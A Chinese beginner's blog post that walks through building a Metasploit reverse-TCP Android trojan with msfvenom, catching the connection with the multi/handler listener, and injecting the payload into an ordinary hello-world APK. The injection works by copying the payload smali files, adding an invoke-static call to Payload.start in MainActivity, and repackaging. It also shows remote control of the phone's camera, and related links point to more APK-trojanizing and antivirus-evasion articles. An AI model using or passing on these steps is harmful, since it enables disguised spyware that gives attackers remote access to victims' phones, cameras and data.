小白尝试——在自己的apk中添加马子

最新推荐文章于 2023-08-23 17:33:52 发布
最新推荐文章于 2023-08-23 17:33:52 发布
阅读量2k 收藏 32
点赞数 3
分类专栏: 随便玩玩 文章标签: apk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44918093/article/details/106122187
版权

起因
昨天写了个hello world apk,今天突然想,能不能在里边注入小马子玩玩,说干就干,不务正业的我又开始啦
工具
kali(我装在VM里) apktool Java环境(Windows) 同一局域网(还不会内网穿透,所以先在自家局域网玩玩)
基础
反编译,签名(前几天的博客有写,用到的这两个步骤在本篇就不细讲了)
我们着重写下面的步骤:
开始
先生成个木马,输入
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx(你的kali的IP地址) LPORT=5555 R>/root/m.apk(也有可能由于没有安装msf而进入失败,输入这个命令安装就好apt install metasploit-framework)

在这里插入图片描述
先测试木马能不能用,所以给手机安装上apk,并在kali上及进入msf控制台(直接输入msfconsole)
在这里插入图片描述
然后进入模块:
use exploit/multi/handler
开始设置参数:
set payload android/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx(生成木马时的ip,也是kali的ip)
set LPORT xxxx(生成木马时写的端口)
开始执行:
run(或者exploit)
结果如下图
在这里插入图片描述
手机打开木马后(注意虚拟机接网要用桥接模式,否则会使kali与手机不再局域网内,然后打开木马也没有,只会一直卡在Start reverse TCP handler on xx.xx.xx.xx这一步),成功的话如下图
在这里插入图片描述
然后就可以各种操作了
查看手机系统信息,查看摄像头列表
拍照
(拍照成功的话会自动打开浏览器显示照片,在这里没有截图下来)
选定摄像头拍照
退出输入exit就可

好!看来马子能用,下面的问题就是怎么把这个马子加到前天写的apk上(可能细心的有缘人看了会问,为什么开头是“昨天”,现在却是“前天”,——因为我写这个花了两天)
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
气死我了,到现在还是没有成功,希望大佬路过可以指点一下

经过各种抱大佬大腿,终于找到个方法(虽然有点点小瑕疵),好我们开始

步骤
把木马加入到hello world.apk中
先反编译 m.apk与hello world.apk
然后进入木马的smali\com\metasploit\stage路径,找到一堆*.smali文件,把它们(除了MainActivity.smali)拷贝到hello world.apk的相同路径的文件下
在这里插入图片描述
然后打开其中的MainActivity.smali文件
在这里插入图片描述
在那个位置添加一行

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

如下:
在这里插入图片描述
然后再打开AndroidManifest.xml文件添加权限,最后打包签名即可(这些步骤之前有写,现在略过)

手机安装以后的效果跟上文一样

小生不才qaq
关注
  • 3
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 8047
Kali Linux使用MSF木马入侵安卓手机
反编译简单分析metasploit生成的安卓木马
Aiwin的博客
02-06 1163
apk反编译简单分析metasploit的安卓木马
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 4735
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
MSF(3)——apk和exe的加马(过360、火绒)
realmels的博客
08-07 6648
apk和exe加马免杀的方法
简单的一次手机APK注入
AomCC的博客
08-23 1117
一次简单的手机APP木马注入
Android APK反编译详解(附图)
wubaohu1314的博客
09-30 2万+
在学Android应用开发,在想既然是用Java开发的应该很好反编译从而得到源代码吧,google了一下,确实很简单,以下是我的实践过程。 在此郑重声明,贴出来的目的不是为了去破解人家的软件,完全是一种学习的态度,不过好像通过这种方式也可以去汉化一些外国软件。一、反编译Apk得到Java源代码 首先要下载两个工具:dex2jar和JD-GUI 前者是将apk的classes.dex转化成Jar文件,而JD-GUI是一个反编译工具,可以直接查看Jar包的源代码。 具体步骤: 首先将apk文件,将后缀改为zi
在Android系统源码预置APK的方法
08-26
"在Android系统源码预置APK的方法" 在Android系统源码预置APK是一种常见的需求,今天我们来分享这篇文章,教你如何在Android系统源码预置APK。预置APK可以将我们需要的APK预置到系统,以便用户使用。 预置...
简阅——android客户端apk文件
06-12
一款基于Google MaterialDesign设计的浏览类Android客户端,包括新闻浏览、图片浏览、图片搜索三个主要功能模块,以及新闻收藏、历史浏览、用户相关以及系统设置等其他子功能模块。
如何通过代码插桩的方式在任何apk添加自己的逻辑代码
01-03
通过安卓修改大师可以很轻松的在任何apk添加新的代码逻辑,实现额外添加的功能,本次教程通过对一款名为“VMware Horizon”的软件进行反编译,实现在登录界面添加自动登录功能(该登录界面之前已经有自动登录功能...
一键给apk资源文件添加资源混淆
最新发布
04-08
一键给apk资源文件添加资源混淆
APK安装工具
08-08
超轻量级的apk安装器,电脑上运行软件,将apk拖进软件,然后点击安装,即可在手机上安装apk。手机上不会自动安装任何软件。 豌豆荚、91助手之类的android手机助手软件,也都有在pc上安装apk的功能,但都会自动在手机上安装相应的软件,很烦。而这个很干净,不会在手机上安装任何附加软件。
查看微信应用签名工具——base.apk.rar
05-08
在Android系统,应用签名是确保应用程序完整性和安全性的关键机制。它是一个数字签名,用于验证应用程序的开发者身份,确保程序未被篡改,并且在安装时授权相应的权限。"查看微信应用签名工具"是一个专门为Android...
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
安卓木马demo_向安卓APK smali源码植入木马
weixin_40008870的博客
12-24 2203
向安卓APK smali源码植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】在安卓应用程序植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码,其第一部分为函数体。注意修改其的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。然后使用第二部分的源码进行...
关于黑客在APK文件植入木马的相关讲解
kyrin(云中鹤)
08-05 8503
最近,成功在一些市场上的apk文件植入自己的短信侦听的代码(非恶意,反对通过此手段做一些不好的事情)比如:神庙逃亡2,fruit monkey等游戏(目测基本上所有游戏都可以植入)      其实吧,在apk植入自己的代码也不是很难,只需要网上一些普通的反编译工具比如:apktool,再加上自己的头脑,就可以了!!一个apk文件反编译成的samli格式的文件,很难对它做修改,因为基本上看不懂
java防报毒_解决反编译后的安卓apk会被报毒的方法
weixin_32349577的博客
02-26 2299
目前几种常用的反编译工具如ApkIDE、APKDB、Androidkiller及较早版本的ApkToolBox 等反编译某些安卓热门apk会被一些安全软件检测含有木马或恶意程序,产生误判误报。原因是一些手机上的安全软件如360等会将这些安卓热门apk的非官方签名列入了与安卓APK文件名一一对应黑名单,解决办法就是重新生成新的证书文件testkey.x509.pem和密钥文件testkey.pk8,...
Kali环境使用Metasploit生成木马入侵安卓手机
热门推荐
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
kali下Kwetza进行安卓APK文件恶意注入
我的学习笔记
02-28 5644
参考:https://www.youtube.com/watch?v=sP8CtMPAwzYhttps://sensepost.com/blog/2016/kwetza-infecting-android-applications/cd /tmp git clone https://github.com/sensepost/kwetza cd kwetz...
Android APK 瘦身 - JOOX Music项目实战
腾讯Bugly的专栏
05-08 1937
导语JOOX Music是腾讯海外布局的一个音乐产品,2014年发布以来已经成为5个国家和地区排名第一的音乐App。东南亚是JOOX Music的主要发行地区,由于JOOX Music所面对的市场存在很多的低端机型,并且这些市场的网络环境相对来说是比较差的,为了提升下载转化率,对JOOX Music进行APK瘦身是必不可免的。JOOX Music版本大小变化JOOX Music(后面简称JOOX)现
localsend apk
02-01
localsend apk是一种用于Android系统的应用安装文件,它的主要作用是在本地将应用程序发送给其他设备进行安装。通过localsend apk,我们可以将应用程序直接发送给其他设备,而无需通过应用商店或其他网络渠道进行下载安装。 使用localsend apk有以下几个优点。首先,localsend apk支持本地传输,通过局域网或蓝牙等方式将应用安装文件发送给其他设备,可以省去通过网络下载的时间和成本。其次,localsend apk可以用于没有联网条件下的设备间传输,比如在偏远地区或网络信号较弱的地方,localsend apk可以为设备提供安装应用的便捷途径。此外,localsend apk还可以用于应用程序的共享和备份。 要使用localsend apk,首先需要将应用程序的安装文件(apk文件)保存到本地设备上。然后,通过localsend apk应用程序,选择要发送的apk文件,并选择目标设备进行传送。传送过程可能需要一些时间,具体时间取决于文件大小和网络传输环境。一旦传送完成,接收设备上将会收到安装的提示,用户只需点击安装即可完成应用的安装过程。 总而言之,localsend apk是一种方便快捷的应用传输方式,它使得应用程序的安装更加便捷和高效。无论是在没有网络条件下的设备间传输,还是在本地共享和备份应用程序,localsend apk都发挥着重要的作用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值